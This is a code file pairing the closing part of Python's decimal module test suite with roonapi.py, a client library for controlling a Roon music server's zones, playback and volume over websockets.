self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000026')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception as err:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
roonapi.py
|
from __future__ import unicode_literals
import os
import threading
import time
from .constants import (
LOGGER,
PAGE_SIZE,
SERVICE_BROWSE,
SERVICE_REGISTRY,
SERVICE_TRANSPORT,
CONTROL_VOLUME,
)
from .discovery import RoonDiscovery
from .roonapisocket import RoonApiWebSocket
def split_media_path(path):
"""Split a path (eg path/to/media) into a list for use by play_media."""
allparts = []
while 1:
parts = os.path.split(path)
if parts[0] == path: # sentinel for absolute paths
allparts.insert(0, parts[0])
break
if parts[1] == path: # sentinel for relative paths
allparts.insert(0, parts[1])
break
path = parts[0]
allparts.insert(0, parts[1])
return allparts
class RoonApi: # pylint: disable=too-many-instance-attributes
"""Class to handle talking to the roon server."""
_roonsocket = None
_roondiscovery = None
_host = None
_core_id = None
_core_name = None
_port = None
_token = None
_exit = False
_zones = {}
_outputs = {}
_state_callbacks = []
ready = False
_volume_controls_request_id = None
_volume_controls = {}
_state_callbacks = []
@property
def token(self):
"""Return the authentication key from the registration with Roon."""
return self._token
@property
def host(self):
"""Return the roon host."""
return self._host
@property
def core_id(self):
"""Return the roon host."""
return self._core_id
@property
def core_name(self):
"""Return the roon core name."""
return self._core_name
@property
def zones(self):
"""Return All zones as a dict."""
return self._zones
@property
def outputs(self):
"""All outputs, returned as dict."""
return self._outputs
def zone_by_name(self, zone_name):
"""Get zone details by name."""
for zone in self.zones.values():
if zone["display_name"] == zone_name:
return zone
return None
def output_by_name(self, output_name):
"""Get the output details from the name."""
for output in self.outputs.values():
if output["display_name"] == output_name:
return output
return None
def zone_by_output_id(self, output_id):
"""Get the zone details by output id."""
for zone in self.zones.values():
for output in zone["outputs"]:
if output["output_id"] == output_id:
return zone
return None
def zone_by_output_name(self, output_name):
"""
Get the zone details by an output name.
params:
output_name: the name of the output
returns: full zone details (dict)
"""
for zone in self.zones.values():
for output in zone["outputs"]:
if output["display_name"] == output_name:
return zone
return None
def is_grouped(self, output_id):
"""
Whether this output is part of a group.
params:
output_id: the id of the output
returns: boolean whether this outout is grouped
"""
try:
output = self.outputs[output_id]
zone_id = output["zone_id"]
is_grouped = len(self.zones[zone_id]["outputs"]) > 1
except KeyError:
is_grouped = False
return is_grouped
def is_group_main(self, output_id):
"""
Whether this output is the the main output of a group.
params:
output_id: the id of the output
returns: boolean whether this output is the main output of a group
"""
if not self.is_grouped(output_id):
return False
output = self.outputs[output_id]
zone_id = output["zone_id"]
is_group_main = self.zones[zone_id]["outputs"][0]["output_id"] == output_id
return is_group_main
def grouped_zone_names(self, output_id):
"""
Get the names of the group players.
params:
output_id: the id of the output
returns: The names of the grouped zones. The first is the main output.
"""
if not self.is_grouped(output_id):
return []
output = self.outputs[output_id]
zone_id = output["zone_id"]
grouped_zone_names = [o["display_name"] for o in self.zones[zone_id]["outputs"]]
return grouped_zone_names
def get_image(self, image_key, scale="fit", width=500, height=500):
"""
Get the image url for the specified image key.
params:
image_key: the key for the image as retrieved in other api calls
scale: optional (value of fit, fill or stretch)
width: the width of the image (required if scale is specified)
height: the height of the image (required if scale is set)
returns: string with the full url to the image
"""
return "http://%s:%s/api/image/%s?scale=%s&width=%s&height=%s" % (
self._host,
self._port,
image_key,
scale,
width,
height,
)
def playback_control(self, zone_or_output_id, control="play"):
"""
Send player command to the specified zone.
params:
zone_or_output_id: the id of the zone or output
control:
* "play" - If paused or stopped, start playback
* "pause" - If playing or loading, pause playback
* "playpause" - If paused or stopped, start playback.
If playing or loading, pause playback.
* "stop" - Stop playback and release the audio device immediately
* "previous" - Go to the start of the current track, or to the previous track
* "next" - Advance to the next track
"""
data = {"zone_or_output_id": zone_or_output_id, "control": control}
return self._request(SERVICE_TRANSPORT + "/control", data)
def pause_all(self):
"""Pause all zones."""
return self._request(SERVICE_TRANSPORT + "/pause_all")
def standby(self, output_id, control_key=None):
"""
Send standby command to the specified output.
params:
output_id: the id of the output to put in standby
control_key: The control_key that identifies the source_control
that is to be put into standby. If omitted,
then all source controls on this output that support
standby will be put into standby.
"""
data = {"output_id": output_id, "control_key": control_key}
return self._request(SERVICE_TRANSPORT + "/standby", data)
def convenience_switch(self, output_id, control_key=None):
"""
Switch (convenience) an output, take it out of standby if needed.
params:
output_id: the id of the output that should be convenience-switched.
control_key: The control_key that identifies the source_control that is to be switched.
If omitted, then all controls on this output will be convenience switched.
"""
data = {"output_id": output_id, "control_key": control_key}
return self._request(SERVICE_TRANSPORT + "/convenience_switch", data)
def mute(self, output_id, mute=True):
"""
Mute/unmute an output.
params:
output_id: the id of the output that should be muted/unmuted
mute: bool if the output should be muted. Will unmute if set to False
"""
how = "mute" if mute else "unmute"
data = {"output_id": output_id, "how": how}
return self._request(SERVICE_TRANSPORT + "/mute", data)
def change_volume(self, output_id, value, method="absolute"):
"""
Change the volume of an output.
For convenience you can always just give the new volume level as percentage.
params:
output_id: the id of the output
value: The new volume value, or the increment value or step (as percentage)
method: How to interpret the volume ('absolute'|'relative'|'relative_step')
"""
if "volume" not in self._outputs[output_id]:
LOGGER.info("This endpoint has fixed volume.")
return None
# Home assistant was catching this - so catch here
# to try and diagnose what needs to be checked.
try:
if method == "absolute":
if self._outputs[output_id]["volume"]["type"] == "db":
value = int((float(value) / 100) * 80) - 80
data = {"output_id": output_id, "how": method, "value": value}
return self._request(SERVICE_TRANSPORT + "/change_volume", data)
except Exception as exc: # pylint: disable=broad-except
LOGGER.error("set_volume_level failed for entity %s.", str(exc))
return None
def seek(self, zone_or_output_id, seconds, method="absolute"):
"""
Seek to a time position within the now playing media.
params:
zone_or_output_id: the id of the zone or output
seconds: The target seek position
method: How to interpret the target seek position ('absolute'|'relative')
"""
data = {
"zone_or_output_id": zone_or_output_id,
"how": method,
"seconds": seconds,
}
return self._request(SERVICE_TRANSPORT + "/seek", data)
def shuffle(self, zone_or_output_id, shuffle=True):
"""
Enable or disable playing in random order.
params:
zone_or_output_id: the id of the output or zone
shuffle: bool if shuffle should be enabled. False will disable shuffle
"""
data = {"zone_or_output_id": zone_or_output_id, "shuffle": shuffle}
return self._request(SERVICE_TRANSPORT + "/change_settings", data)
def repeat(self, zone_or_output_id, repeat=True):
"""
Enable/disable playing in a loop.
params:
zone_or_output_id: the id of the output or zone
repeat: bool if repeat should be enabled. False will disable shuffle
"""
loop = "loop" if repeat else "disabled"
data = {"zone_or_output_id": zone_or_output_id, "loop": loop}
return self._request(SERVICE_TRANSPORT + "/change_settings", data)
def transfer_zone(self, from_zone_or_output_id, to_zone_or_output_id):
"""
Transfer the current queue from one zone to another.
params:
from_zone_or_output_id - The source zone or output
to_zone_or_output_id - The destination zone or output
"""
data = {
"from_zone_or_output_id": from_zone_or_output_id,
"to_zone_or_output_id": to_zone_or_output_id,
}
return self._request(SERVICE_TRANSPORT + "/transfer_zone", data)
def group_outputs(self, output_ids):
"""
Create a group of synchronized audio outputs.
params:
output_ids - The outputs to group. The first output's zone's queue is preserved.
"""
data = {"output_ids": output_ids}
return self._request(SERVICE_TRANSPORT + "/group_outputs", data)
def ungroup_outputs(self, output_ids):
"""
Ungroup outputs previous grouped.
params:
output_ids - The outputs to ungroup.
"""
data = {"output_ids": output_ids}
return self._request(SERVICE_TRANSPORT + "/ungroup_outputs", data)
def register_state_callback(self, callback, event_filter=None, id_filter=None):
"""
Register a callback to be informed about changes to zones or outputs.
params:
callback: method to be called when state changes occur, it will be passed an event param as string and a list of changed objects
callback will be called with params:
- event: string with name of the event ("zones_changed", "zones_seek_changed", "outputs_changed")
- a list with the zone or output id's that changed
event_filter: only callback if the event is in this list
id_filter: one or more zone or output id's or names to filter on (list or string)
"""
if not event_filter:
event_filter = []
elif not isinstance(event_filter, list):
event_filter = [event_filter]
if not id_filter:
id_filter = []
elif not isinstance(id_filter, list):
id_filter = [id_filter]
self._state_callbacks.append((callback, event_filter, id_filter))
def register_queue_callback(self, callback, zone_or_output_id=""):
"""
Subscribe to queue change events.
callback: function which will be called with the updated data (provided as dict object
zone_or_output_id: If provided, only listen for updates for this zone or output
"""
if zone_or_output_id:
opt_data = {"zone_or_output_id": zone_or_output_id}
else:
opt_data = None
self._roonsocket.subscribe(SERVICE_TRANSPORT, "queue", callback, opt_data)
def browse_browse(self, opts):
"""
Complex browse call on the roon api.
reference: https://github.com/RoonLabs/node-roon-api-browse/blob/master/lib.js
"""
return self._request(SERVICE_BROWSE + "/browse", opts)
def browse_load(self, opts):
"""
Complex browse call on the roon api.
reference: https://github.com/RoonLabs/node-roon-api-browse/blob/master/lib.js
"""
return self._request(SERVICE_BROWSE + "/load", opts)
def play_media(self, zone_or_output_id, path, action=None):
"""
Play the media specified.
params:
zone_or_output_id: where to play the media
path: a list allowing roon to find the media
eg ["Library", "Artists", "Neil Young", "Harvest"] or ["My Live Radio", "BBC Radio 4"]
action: the roon action to take to play the media - leave blank to choose the roon default
eg "Play Now", "Queue" or "Start Radio"
"""
opts = {
"zone_or_output_id": zone_or_output_id,
"hierarchy": "browse",
"count": PAGE_SIZE,
"pop_all": True,
}
total_count = self.browse_browse(opts)["list"]["count"]
del opts["pop_all"]
load_opts = {
"zone_or_output_id": zone_or_output_id,
"hierarchy": "browse",
"count": PAGE_SIZE,
"offset": 0,
}
items = []
for element in path:
load_opts["offset"] = 0
found = None
searched = 0
LOGGER.debug("Looking for %s", element)
while searched < total_count and found is None:
items = self.browse_load(load_opts)["items"]
for item in items:
searched += 1
if item["title"] == element:
found = item
break
load_opts["offset"] += PAGE_SIZE
if searched >= total_count and found is None:
LOGGER.error(
"Could not find media path element '%s' in %s",
element,
[item["title"] for item in items],
)
return None
opts["item_key"] = found["item_key"]
load_opts["item_key"] = found["item_key"]
total_count = self.browse_browse(opts)["list"]["count"]
load_opts["offset"] = 0
items = self.browse_load(load_opts)["items"]
if found["hint"] == "action":
# Loading item we found already started playing
return True
# First item shoule be the action/action_list for playing this item (eg Play Genre, Play Artist, Play Album)
if items[0].get("hint") not in ["action_list", "action"]:
LOGGER.error(
"Found media does not have playable action_list hint='%s' '%s'",
items[0].get("hint"),
[item["title"] for item in items],
)
return False
play_header = items[0]["title"]
if items[0].get("hint") == "action_list":
opts["item_key"] = items[0]["item_key"]
load_opts["item_key"] = items[0]["item_key"]
self.browse_browse(opts)
items = self.browse_load(load_opts)["items"]
# We should now have play actions (eg Play Now, Add Next, Queue action, Start Radio)
# So pick the one to use - the default is the first one
if action is None:
take_action = items[0]
else:
found_actions = [item for item in items if item["title"] == action]
if len(found_actions) == 0:
LOGGER.error(
"Could not find play action '%s' in %s",
action,
[item["title"] for item in items],
)
return False
take_action = found_actions[0]
if take_action["hint"] != "action":
LOGGER.error(
"Found media does not have playable action %s - %s",
take_action["title"],
take_action["hint"],
)
return False
opts["item_key"] = take_action["item_key"]
load_opts["item_key"] = take_action["item_key"]
LOGGER.info("Play action was '%s' / '%s'", play_header, take_action["title"])
self.browse_browse(opts)
return True
# pylint: disable=too-many-return-statements
def play_id(self, zone_or_output_id, media_id):
"""Play based on the media_id from the browse api."""
opts = {
"zone_or_output_id": zone_or_output_id,
"item_key": media_id,
"hierarchy": "browse",
}
header_result = self.browse_browse(opts)
# For Radio the above load starts play - so catch this and return
try:
if header_result["list"]["level"] == 0:
LOGGER.info("Initial load started playback")
return True
except (NameError, KeyError, TypeError):
LOGGER.error("Could not play id:%s, result: %s", media_id, header_result)
return False
if header_result is None:
LOGGER.error(
"Playback requested of unsupported id: %s",
media_id,
)
return False
result = self.browse_load(opts)
first_item = result["items"][0]
hint = first_item["hint"]
if not (hint in ["action", "action_list"]):
LOGGER.error(
"Playback requested but item is a list, not a playable action or action_list id: %s",
media_id,
)
return False
if hint == "action_list":
opts["item_key"] = first_item["item_key"]
result = self.browse_browse(opts)
if result is None:
LOGGER.error(
"Playback requested of unsupported id: %s",
media_id,
)
return False
result = self.browse_load(opts)
first_item = result["items"][0]
hint = first_item["hint"]
if hint != "action":
LOGGER.error(
"Playback requested but item does not have a playable action id: %s, %s",
media_id,
header_result,
)
return False
play_action = result["items"][0]
hint = play_action["hint"]
LOGGER.info("'%s' for '%s')", play_action["title"], header_result)
opts["item_key"] = play_action["item_key"]
self.browse_browse(opts)
if result is None:
LOGGER.error(
"Playback requested of unsupported id: %s",
media_id,
)
return False
return True
# private methods
# pylint: disable=too-many-arguments
def __init__(
self,
appinfo,
token=None,
host=None,
port=9100,
blocking_init=True,
core_id=None,
):
"""
Set up the connection with Roon.
appinfo: a dict of the required information about the app that should be connected to the api
token: used for presistant storage of the auth token, will be set to token attribute if retrieved. You should handle saving of the key yourself
host: optional the ip or hostname of the Roon server, will be auto discovered if ommitted
port: optional the http port of the Roon websockets api. Should be default of 9100
blocking_init: By default the init will halt untill the socket is connected and the app is authenticated,
if you set bool to False the init will continue but you will only receive data once the connection is fully initialized.
The latter is preferred if you're (only) using the callbacks
"""
self._appinfo = appinfo
self._token = token
if not appinfo or not isinstance(appinfo, dict):
raise "appinfo missing or in incorrect format!"
if host and port:
self._server_discovered(host, port)
else:
self._roondiscovery = RoonDiscovery(self._server_discovered, core_id)
self._roondiscovery.start()
# block untill we're ready
if blocking_init:
while not self.ready and not self._exit:
time.sleep(1)
# start socket watcher
thread_id = threading.Thread(target=self._socket_watcher)
thread_id.daemon = True
thread_id.start()
# pylint: disable=redefined-builtin
def __exit__(self, type, value, exc_tb):
"""Stop socket and discovery on exit."""
self.stop()
def __enter__(self):
"""Just return self on entry."""
return self
def stop(self):
"""Stop socket and discovery."""
self._exit = True
if self._roondiscovery:
self._roondiscovery.stop()
if self._roonsocket:
self._roonsocket.stop()
def _server_discovered(self, host, port):
"""(Auto) discovered the roon server on the network."""
LOGGER.info("Connecting to Roon server %s:%s" % (host, port))
ws_address = "ws://%s:%s/api" % (host, port)
self._host = host
self._port = port
self._roonsocket = RoonApiWebSocket(ws_address)
self._roonsocket.register_connected_callback(self._socket_connected)
self._roonsocket.register_registered_calback(self._server_registered)
self._roonsocket.register_volume_controls_callback(self._on_volume_control_request)
self._roonsocket.start()
def _socket_connected(self):
"""Successfully connected the websocket."""
LOGGER.info("Connection with roon websockets (re)created.")
self.ready = False
self._volume_controls_request_id = None
# authenticate / register
# warning: at first launch the user has to approve the app in the Roon settings.
appinfo = self._appinfo.copy()
appinfo["required_services"] = [SERVICE_TRANSPORT, SERVICE_BROWSE]
appinfo["provided_services"] = [CONTROL_VOLUME]
if self._token:
appinfo["token"] = self._token
if not self._token:
LOGGER.info("The application should be approved within Roon's settings.")
else:
LOGGER.info("Confirming previous registration with Roon...")
self._roonsocket.send_request(SERVICE_REGISTRY + "/register", appinfo)
def _server_registered(self, reginfo):
LOGGER.info("Registered to Roon server %s", reginfo["display_name"])
LOGGER.debug(reginfo)
self._token = reginfo["token"]
self._core_id = reginfo["core_id"]
self._core_name = reginfo["display_name"]
# fill zones and outputs dicts one time so the data is available right away
if not self._zones:
self._zones = self._get_zones()
if not self._outputs:
self._outputs = self._get_outputs()
# subscribe to state change events
self._roonsocket.subscribe(SERVICE_TRANSPORT, "zones", self._on_state_change)
self._roonsocket.subscribe(SERVICE_TRANSPORT, "outputs", self._on_state_change)
# set flag that we're fully initialized (used for blocking init)
self.ready = True
# pylint: disable=too-many-branches
def _on_state_change(self, msg):
"""Process messages we receive from the roon websocket into a more usable format."""
events = []
if not msg or not isinstance(msg, dict):
return
for state_key, state_values in msg.items():
changed_ids = []
filter_keys = []
if state_key in [
"zones_seek_changed",
"zones_changed",
"zones_added",
"zones",
]:
for zone in state_values:
if zone["zone_id"] in self._zones:
self._zones[zone["zone_id"]].update(zone)
else:
self._zones[zone["zone_id"]] = zone
changed_ids.append(zone["zone_id"])
if "display_name" in zone:
filter_keys.append(zone["display_name"])
if "outputs" in zone:
for output in zone["outputs"]:
filter_keys.append(output["output_id"])
filter_keys.append(output["display_name"])
event = (
"zones_seek_changed"
if state_key == "zones_seek_changed"
else "zones_changed"
)
events.append((event, changed_ids, filter_keys))
elif state_key in ["outputs_changed", "outputs_added", "outputs"]:
for output in state_values:
if output["output_id"] in self._outputs:
self._outputs[output["output_id"]].update(output)
else:
self._outputs[output["output_id"]] = output
changed_ids.append(output["output_id"])
filter_keys.append(output["display_name"])
filter_keys.append(output["zone_id"])
event = "outputs_changed"
events.append((event, changed_ids, filter_keys))
elif state_key == "zones_removed":
for item in state_values:
del self._zones[item]
elif state_key == "outputs_removed":
for item in state_values:
del self._outputs[item]
else:
LOGGER.warning("unknown state change: %s" % msg)
for event, changed_ids, filter_keys in events:
filter_keys.extend(changed_ids)
for item in self._state_callbacks:
callback = item[0]
event_filter = item[1]
id_filter = item[2]
if event_filter and (event not in event_filter):
continue
if id_filter and set(id_filter).isdisjoint(filter_keys):
continue
try:
callback(event, changed_ids)
# pylint: disable=broad-except
except Exception:
LOGGER.exception("Error while executing callback!")
def _get_outputs(self):
outputs = {}
data = self._request(SERVICE_TRANSPORT + "/get_outputs")
if data and "outputs" in data:
for output in data["outputs"]:
outputs[output["output_id"]] = output
return outputs
def _get_zones(self):
zones = {}
data = self._request(SERVICE_TRANSPORT + "/get_zones")
if data and "zones" in data:
for zone in data["zones"]:
zones[zone["zone_id"]] = zone
return zones
def _request(self, command, data=None):
"""Send command and wait for result."""
if not self._roonsocket:
retries = 20
while (not self.ready or not self._roonsocket) and retries:
retries -= 1
time.sleep(0.2)
if not self.ready or not self._roonsocket:
LOGGER.warning("socket is not yet ready")
if not self._roonsocket:
return None
request_id = self._roonsocket.send_request(command, data)
result = None
retries = 50
while retries:
result = self._roonsocket.results.get(request_id)
if result:
break
retries -= 1
time.sleep(0.05)
try:
del self._roonsocket.results[request_id]
except KeyError:
pass
return result
def _socket_watcher(self):
"""Monitor the connection state of the socket and reconnect if needed."""
while not self._exit:
if self._roonsocket and self._roonsocket.failed_state:
LOGGER.warning("Socket connection lost! Will try to reconnect in 20s")
count = 0
while not self._exit and count < 21:
count += 1
time.sleep(1)
if not self._exit:
self._server_discovered(self._host, self._port)
time.sleep(2)
def register_volume_control(self, control_key, display_name, callback, initial_volume=0, volume_type="number", volume_step=2, volume_min=0, volume_max=100, is_muted=False):
''' register a new volume control on the api'''
if control_key in self._volume_controls:
LOGGER.error("source_control %s is already registered!" % control_key)
return
control_data = {
"display_name": display_name,
"volume_type": volume_type,
"volume_min": volume_min,
"volume_max": volume_max,
"volume_value": initial_volume,
"volume_step": volume_step,
"is_muted": is_muted,
"control_key": control_key
}
self._volume_controls[control_key] = (callback, control_data)
if self._volume_controls_request_id:
data = {"controls_added":[ control_data ]}
self._roonsocket.send_continue(self._volume_controls_request_id, data)
def update_volume_control(self, control_key, volume=None, mute=None):
''' update an existing volume control, report its state to Roon '''
if control_key not in self._volume_controls:
LOGGER.warning("volume_control %s is not (yet) registered!" % control_key)
return
if not self._volume_controls_request_id:
LOGGER.warning("Not yet registered, can not update volume control")
return False
if volume != None:
self._volume_controls[control_key][1]["volume_value"] = volume
if mute != None:
self._volume_controls[control_key][1]["is_muted"] = mute
data = {"controls_changed": [ self._volume_controls[control_key][1] ] }
self._roonsocket.send_continue(self._volume_controls_request_id, data)
def _on_volume_control_request(self, event, request_id, data):
''' got request from roon server for a volume control registered on this endpoint'''
if event == "subscribe_controls":
LOGGER.debug("found subscription ID for volume controls: %s " % request_id)
# send all volume controls already registered (handle connection loss)
controls = []
for callback, control_data in self._volume_controls.values():
controls.append(control_data)
